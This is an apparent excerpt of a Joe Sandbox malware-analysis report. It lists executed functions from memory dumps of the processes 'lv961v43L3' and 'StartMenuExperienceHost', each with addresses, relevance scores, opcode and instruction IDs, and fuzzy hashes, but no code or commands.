                                                                  • Instruction Fuzzy Hash: CDC04C11F1B81A9AF266631450212BE44579F84748F942075E40E973CACF4D5E41428F
                                                                  Function 00007FF848F106C8 Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000021.00000002.2295968594.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_33_2_7ff848f10000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6eba791d88507fcd9b52fcee0306e07b664c1240055e9c8e5b93111289e53873
                                                                  • Instruction ID: 2f1a5e52f775f867b58c9a59c602190bf2d901c60125e77e7b5c4922becc21b6
                                                                  • Opcode Fuzzy Hash: 6eba791d88507fcd9b52fcee0306e07b664c1240055e9c8e5b93111289e53873
                                                                  • Instruction Fuzzy Hash: 32B01210C6E40F04E404337A084206570405B88340FC40070D80C401C19A4D18D4068A

                                                                  Executed Functions

                                                                  Function 00007FF848F30D4C Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 5Y_H
                                                                  • API String ID: 0-3237497481
                                                                  • Opcode ID: 8a5a02c4383d30c74658e70345dee34012e7feb6bfa643176c47c8823e63136e
                                                                  • Instruction ID: 17c025ab30595bb34f943a68242a224972849db0576b29cb1f4e595a889e1b12
                                                                  • Opcode Fuzzy Hash: 8a5a02c4383d30c74658e70345dee34012e7feb6bfa643176c47c8823e63136e
                                                                  • Instruction Fuzzy Hash: F491CC71E1DA9D8FE78AEB28886A7A97FE1FB95354F4001BBD009D72D2CF7918048714
                                                                  Function 00007FF848F30E43 Relevance: .2, Instructions: 170COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 57950658e4a25f341ab6be5129d98af244b63ebb6f9bd35a40a8f9d19726da28
                                                                  • Instruction ID: 9eafe1e302432a12337f3cb18870616f90b34ac50c85282220d8cc019e92c2af
                                                                  • Opcode Fuzzy Hash: 57950658e4a25f341ab6be5129d98af244b63ebb6f9bd35a40a8f9d19726da28
                                                                  • Instruction Fuzzy Hash: F951AD71A29A9D8EE789EB2884697B97FE1FB95354F4002BFD00DD37D2CBB914118704
                                                                  Function 00007FF848F30B3F Relevance: 3.8, Strings: 3, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: c9$!k9$"s9
                                                                  • API String ID: 0-3426396564
                                                                  • Opcode ID: cdf7b1fedab0e168c2ec0b290fe1cc7e2c36fd2936d99a0828d24243f39e5afb
                                                                  • Instruction ID: 386a76b0966d0e40da1e6e04ded984efde0c60a5b7caa05744b9f1ec4f4d1ef4
                                                                  • Opcode Fuzzy Hash: cdf7b1fedab0e168c2ec0b290fe1cc7e2c36fd2936d99a0828d24243f39e5afb
                                                                  • Instruction Fuzzy Hash: 0F01263771E94E4BD7417B3DF8904E8B740EA97236B9503F7D444C7192E642144A83D0
                                                                  Function 00007FF848F63A9D Relevance: 2.7, Strings: 2, Instructions: 235COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @aH$M
                                                                  • API String ID: 0-2096102131
                                                                  • Opcode ID: b4b36fec0323695dc6a3af0f3d50ad6fe417eb5996ec7814ca38ec522039b788
                                                                  • Instruction ID: 2390501c312527a73756a2b6bb545400c97e4d2d96a8fed6f254489af8c3d4c6
                                                                  • Opcode Fuzzy Hash: b4b36fec0323695dc6a3af0f3d50ad6fe417eb5996ec7814ca38ec522039b788
                                                                  • Instruction Fuzzy Hash: 4171BF32E0D99A9FE659BB2C84662B4A7D1FF95390F4812B9C40DD71C3DE2C6C878349
                                                                  Function 00007FF848F62268 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: b545757dfe61d8dbff3d709285017c5389a8cdd8688645e9050446f93ae91f0a
                                                                  • Instruction ID: 4a524386ad849876ab5fcf95d7da1f76272cbe613d6a590d00c8d9b84a3a7146
                                                                  • Opcode Fuzzy Hash: b545757dfe61d8dbff3d709285017c5389a8cdd8688645e9050446f93ae91f0a
                                                                  • Instruction Fuzzy Hash: 3C11BF2184F3C14FEB07A73448299A57FA0AF53355B0D82EED0D6CF4E3DA29584AC712
                                                                  Function 00007FF848F6A569 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 56fbc6fc97b1bcecf08acc8d6eed9abf6990e403b9c33b92d371ff91cd345452
                                                                  • Instruction ID: ae2d6ea23a34f07a518a881af88f1ab7ddf4dc904f5a6174b77cd3a08b0894cc
                                                                  • Opcode Fuzzy Hash: 56fbc6fc97b1bcecf08acc8d6eed9abf6990e403b9c33b92d371ff91cd345452
                                                                  • Instruction Fuzzy Hash: 32E06571A0E7844FD719EA3444594547F60EF6720174952EEC046CB1A3EA1DDC86C701
                                                                  Function 00007FF848F63609 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: f10865428145077676a45b74ea5f0ead43a67f61ed297e9f86b39a68d685ba52
                                                                  • Instruction ID: b1238a6f2d8d5765e86713de2fcdaf411f425ffafddb837c792f56944be9703a
                                                                  • Opcode Fuzzy Hash: f10865428145077676a45b74ea5f0ead43a67f61ed297e9f86b39a68d685ba52
                                                                  • Instruction Fuzzy Hash: 86F0A02050E7C44FC706AB388829455BFA0EE6720074A52EEC045CF1A3EA298886C701
                                                                  Function 00007FF848F62319 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 085713bfedbf6abb70d479466468059670f95413270aa140e942f627365aad51
                                                                  • Instruction ID: 716b02703acb82ec155c38c843cea04be91fb7fee3e6fb5335c17d0ed5347562
                                                                  • Opcode Fuzzy Hash: 085713bfedbf6abb70d479466468059670f95413270aa140e942f627365aad51
                                                                  • Instruction Fuzzy Hash: EEF0657190E3C44FC716E7744869455BFA0EF6721174951EEC486CF1A7EA2D9885C701
                                                                  Function 00007FF848F6A5F9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: fd628c14d0a6d327f224e11269401f3bc157ea228b4a9bbcf55f9aa88b88c369
                                                                  • Instruction ID: b53dba1cde5c11323ebfb1b29abc625a7f63ffb2d7476b9cbbe3042c47b5400b
                                                                  • Opcode Fuzzy Hash: fd628c14d0a6d327f224e11269401f3bc157ea228b4a9bbcf55f9aa88b88c369
                                                                  • Instruction Fuzzy Hash: B2E06D71A0E7C44FC71AAB34886D454BFA0EF6721174A52EFC045CF1A7EA2D8889C702
                                                                  Function 00007FF848F6AB39 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: I
                                                                  • API String ID: 0-3707901625
                                                                  • Opcode ID: c2b03b3c7214bbb85c78b4e4e6b08611e86646ba3f54fb9bb01ff187a7e4516c
                                                                  • Instruction ID: 1f86975cbf049c1593bf7bac15fa509cd99c588d209dde6422105e48f4985f2d
                                                                  • Opcode Fuzzy Hash: c2b03b3c7214bbb85c78b4e4e6b08611e86646ba3f54fb9bb01ff187a7e4516c
                                                                  • Instruction Fuzzy Hash: 09E0127144E7C04FDB49EB3484658547F60EE6721178A41EEC045CB1B3E61DD84AC701
                                                                  Function 00007FF848F623A9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: I
                                                                  • API String ID: 0-3707901625
                                                                  • Opcode ID: 2a421c1fa75d6f069513473085aa75eddd319fa91f61dd09c93569bc9381ab77
                                                                  • Instruction ID: 60518a5d8b6f89b77563a58f2784de2c3ecca262f3aadca85dfd2d445370c3c4
                                                                  • Opcode Fuzzy Hash: 2a421c1fa75d6f069513473085aa75eddd319fa91f61dd09c93569bc9381ab77
                                                                  • Instruction Fuzzy Hash: 27E0ED7144E7D08FC70AEB7488658547F60EE6721174A51DED045CF1B3E6299849C701
                                                                  Function 00007FF848F67E49 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: I
                                                                  • API String ID: 0-3707901625
                                                                  • Opcode ID: a1078724cb384243e897ce26806092ae8e723e60f61d7a6d6b93ad97787d26af
                                                                  • Instruction ID: ee85b32d742a3a1329847b303f4fa174bfe311db8b7f05c6220b239a2759e865
                                                                  • Opcode Fuzzy Hash: a1078724cb384243e897ce26806092ae8e723e60f61d7a6d6b93ad97787d26af
                                                                  • Instruction Fuzzy Hash: 2AE0ED6184E7C44FD706EB74887A9557FA09E6721074A41EEC085CF1A3E62E9849C701
                                                                  Function 00007FF848F69078 Relevance: .1, Instructions: 138COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e73a237150e1869eea50b47846cce731abbce61a1fe0cd0bba6aea73d60a8ab7
                                                                  • Instruction ID: 38b4964b11bfbd1ac087d49f39d32c98ac57c1d245ff9d435db2a82b7cdf42a8
                                                                  • Opcode Fuzzy Hash: e73a237150e1869eea50b47846cce731abbce61a1fe0cd0bba6aea73d60a8ab7
                                                                  • Instruction Fuzzy Hash: C2410233E2E152AEE751BBBCB4420E93760EF403A4F084376D14C9F497DF1C244A86A8
                                                                  Function 00007FF848F63BEF Relevance: .1, Instructions: 133COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d11c995956e5ee9e3dc840bc37ef9e26f2c7a0db1fa85942a37e23619ae8d067
                                                                  • Instruction ID: c7ab23bf10c49cb04c76cddee8919ccae657606c726b29401bbb9eb8b7a99bdc
                                                                  • Opcode Fuzzy Hash: d11c995956e5ee9e3dc840bc37ef9e26f2c7a0db1fa85942a37e23619ae8d067
                                                                  • Instruction Fuzzy Hash: CC419F31A1D95A5FE688FB2C84566B9B3D2FF99380F444179D40DC32C3DE2C68828799
                                                                  Function 00007FF848F63BC6 Relevance: .1, Instructions: 132COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 19356e50cde213dc014986de5ec47103eed6596f74f6a71b6e2b47f9d9b96f60
                                                                  • Instruction ID: 638c0302705e886daee83bdcce39c990c47645137aeeb510c20abe940860f16e
                                                                  • Opcode Fuzzy Hash: 19356e50cde213dc014986de5ec47103eed6596f74f6a71b6e2b47f9d9b96f60
                                                                  • Instruction Fuzzy Hash: 24419C31A1C95A5EEA98FB2C84626B9A3D1FF99780F441279D40DD32C3DE2C68828359
                                                                  Function 00007FF848F308D0 Relevance: .1, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e3eb25388a5dbc1357459278b61171bef024bd088e9fec6796b19241e7e19c84
                                                                  • Instruction ID: e6f27d07ef1cac580a99b266268b79876cc191d0b583f71852edbc4973bceabe
                                                                  • Opcode Fuzzy Hash: e3eb25388a5dbc1357459278b61171bef024bd088e9fec6796b19241e7e19c84
                                                                  • Instruction Fuzzy Hash: 4B413822A1E9599EE344B77C60892FD7790EF853A8F0806BBE44DCB1D7DF1C6841829C
                                                                  Function 00007FF848F30998 Relevance: .1, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 711ae25dd07a7104d64c1249981918eabdbe63b284f9ef56b2f336e14774c715
                                                                  • Instruction ID: e41ea6bb9dda8d7d6143425d3863dd8f4960e969d790d3e669e99a88199a17c1
                                                                  • Opcode Fuzzy Hash: 711ae25dd07a7104d64c1249981918eabdbe63b284f9ef56b2f336e14774c715
                                                                  • Instruction Fuzzy Hash: B321D631B1D9195FE788F72D545967936C6EFA8355F1000BEE80EC33D7DE18AC418689
                                                                  Function 00007FF848F623E1 Relevance: .1, Instructions: 88COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b681e154159b0bb9ec29f2cecbc0856d17637c374fa938946ea1d51fcd623bdc
                                                                  • Instruction ID: 52e1af4cd6d6c73e5d8db5873fb683ed7824a538649be48e9a8886794b4a8e76
                                                                  • Opcode Fuzzy Hash: b681e154159b0bb9ec29f2cecbc0856d17637c374fa938946ea1d51fcd623bdc
                                                                  • Instruction Fuzzy Hash: CA21F932E0DA865FE785FBA854963B46691FF99340F4401BAD40CD71C3DE2C28D68349
                                                                  Function 00007FF848F30C25 Relevance: .1, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 54a29490b25be4d1f687d85187173f71a11f446f393feb6a85da4fb50b520c7c
                                                                  • Instruction ID: f0fa7df12c5de988e157799f020e772424a9a45317f46197cb7153b8d9332302
                                                                  • Opcode Fuzzy Hash: 54a29490b25be4d1f687d85187173f71a11f446f393feb6a85da4fb50b520c7c
                                                                  • Instruction Fuzzy Hash: 9121E136A0D28ADEE312BB6898511EC7B60EF823A5F1442B3D448CA1C3DB3C6546C799
                                                                  Function 00007FF848F62AAC Relevance: .1, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4a63be303a1b8078479eb1dc20213bc23c8e9816b9b2f8d789baaf041bb319b7
                                                                  • Instruction ID: 37105fb867f5d4528b78b36f2a5e19f277c1388133d7615db897fc0ffa5a8064
                                                                  • Opcode Fuzzy Hash: 4a63be303a1b8078479eb1dc20213bc23c8e9816b9b2f8d789baaf041bb319b7
                                                                  • Instruction Fuzzy Hash: A0113032E0C9298FE7A9EB58D4557A933A1FBA8750F140279D40DD72C5DB78AC428784
                                                                  Function 00007FF848F66F18 Relevance: .1, Instructions: 61COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e1e7905532c106fd82661c84aef446e8ba63f27cd2f177eab79d654b95fd6e1b
                                                                  • Instruction ID: eafc81defa1d1f132de05b56ab821d01e5b9b62e20e4865cb7e1ca0c1750c5b4
                                                                  • Opcode Fuzzy Hash: e1e7905532c106fd82661c84aef446e8ba63f27cd2f177eab79d654b95fd6e1b
                                                                  • Instruction Fuzzy Hash: 7C01FC17A1F55259D704B27D74564F93B90DF412BEF0843B7E14CCD083EE1C548A82A8
                                                                  Function 00007FF848F31996 Relevance: .1, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0177b27e6d1d6d2e01c6123903a31cef011e54f0d8477361e0bdd715d9eb0eb4
                                                                  • Instruction ID: ec756037848980c18fea1e4f06b2d5858bfdd01ad1dcee803d84f6de0d14b356
                                                                  • Opcode Fuzzy Hash: 0177b27e6d1d6d2e01c6123903a31cef011e54f0d8477361e0bdd715d9eb0eb4
                                                                  • Instruction Fuzzy Hash: 5E110031E0C80A8FEB94FB28C8556B83392AF94351F1541B7D44DD72D2EE28A9C18B48
                                                                  Function 00007FF848F30C38 Relevance: .1, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0f8a9f341fe8218e3760f55c97f3bff96735b74ee7a2d60fad55703c77019937
                                                                  • Instruction ID: 3a71bb314679097b5dec2c4f2855fe352caf3c425d435c68a085d6fca8e973f6
                                                                  • Opcode Fuzzy Hash: 0f8a9f341fe8218e3760f55c97f3bff96735b74ee7a2d60fad55703c77019937
                                                                  • Instruction Fuzzy Hash: 6411A031E0D68D8FE702FB7898411AC7BB0EF82390F1546F7C844DB2D2DA3855458785
                                                                  Function 00007FF848F45CD5 Relevance: .1, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f40000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: efdb8d5751f5609fe10e8a8e81bdb3bb83c9982d870ef0c0942069361ad72c15
                                                                  • Instruction ID: 787f1b183339f397ddad15c61d6073518a79e6530659fd88d20dff03b8d09153
                                                                  • Opcode Fuzzy Hash: efdb8d5751f5609fe10e8a8e81bdb3bb83c9982d870ef0c0942069361ad72c15
                                                                  • Instruction Fuzzy Hash: 42115474E0C6198FDBD5FB08C884659B3B6FFA8B10F1042A5D04CD3289CA30AE818B44
                                                                  Function 00007FF848F30C40 Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ee887375ce99bde7207ffd9602e04b0424bcdae5f5b49929560317fbb454ad21
                                                                  • Instruction ID: 5cf12bb5952646474ec6225339484417acfc79aea519d1a6811fbc1f87a7dc1f
                                                                  • Opcode Fuzzy Hash: ee887375ce99bde7207ffd9602e04b0424bcdae5f5b49929560317fbb454ad21
                                                                  • Instruction Fuzzy Hash: 57118B31E0D6898FE702FB6898500AD7BB0EF82390F1541F7D844DB2D2DA386549CB85
                                                                  Function 00007FF848F3190D Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05a9d6eb68c0afeda28549dd331f9d198dbf27536d53e0cb9af3d2339b72710d
                                                                  • Instruction ID: c0d8a9ea79e3b1e6d03bb995c6e5e82d957d50c6dd058d0c4f8a482d2288db3d
                                                                  • Opcode Fuzzy Hash: 05a9d6eb68c0afeda28549dd331f9d198dbf27536d53e0cb9af3d2339b72710d
                                                                  • Instruction Fuzzy Hash: 51018031E0D81B8FE7E4FB1888143BD6292AF94391F1502B7E41DD32D2EF386D858648
                                                                  Function 00007FF848F6D83B Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b31a336ac11a6543c5839567233745f60659c15b547fb75017dfe248361be0de
                                                                  • Instruction ID: 3af2290397855e3afa5e6f611e2daf25a53ef2dfc11a3cc30ee2e55f1d644b77
                                                                  • Opcode Fuzzy Hash: b31a336ac11a6543c5839567233745f60659c15b547fb75017dfe248361be0de
                                                                  • Instruction Fuzzy Hash: F6017131F0841A8EFB58F62998497BD73A2EBE4751F149235C019A71C5CF3A59478784
                                                                  Function 00007FF848F35A29 Relevance: .0, Instructions: 40COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7f5d23171c19b9a7f7bae2494c0b8a1a109f76b656ecbb037d815084e5c4b5c9
                                                                  • Instruction ID: 8225c1871856a0c9bac5c5dc5cc3f598d9b25b9738d053b15148ea4ec8a7776a
                                                                  • Opcode Fuzzy Hash: 7f5d23171c19b9a7f7bae2494c0b8a1a109f76b656ecbb037d815084e5c4b5c9
                                                                  • Instruction Fuzzy Hash: CB018431508A4ACFCB55EF04C890BA973F1FBA8314F0502AAD40DD72A1DB34EA40DF40
                                                                  Function 00007FF848F30C50 Relevance: .0, Instructions: 40COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f30000_StartMenuExperienceHost.jbxd
